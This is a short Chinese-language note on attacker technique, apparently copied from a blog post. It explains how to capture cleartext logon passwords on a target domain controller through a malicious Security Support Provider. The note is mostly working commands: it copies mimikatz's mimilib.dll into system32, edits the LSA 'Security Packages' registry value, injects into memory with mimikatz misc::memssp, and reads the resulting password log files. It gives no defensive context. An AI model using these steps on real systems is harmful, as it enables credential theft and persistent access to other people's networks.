一、ssp密码记录
ssp(security Support Provider),一个用于身份验证的 dll,系统在启动时 SSP 会被加载到 lsass.exe 进程中,由于 lsa 可扩展,导致在系统启动时我们可以加载一个自定义的 dll,一个用于记录所有登录到当 前系统的明文账号密码的 dll, 利用mimikatz 中mimilib.dll 文件。
把 mimikatz 中的 mimilib.dll 传到目标域控的 c:\windows\system32\目录下
copy mimilib.dll %systemroot%\system32
reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ
重启成功,如果有用户成功登录到当前系统中,会在 c:\windows\system32 目录下生成一个用于记录登账账号密码的 kiwissp.log 文件
(2)利用方式二 ,利用进程注入,无需重启立即开启密码记录,重启则计算机失效
mimikatz privilege::debug
mimikatz misc::memssp
type C:\Windows\System32\mimilsa.log
原文:https://www.cnblogs.com/websecyw/p/11804624.html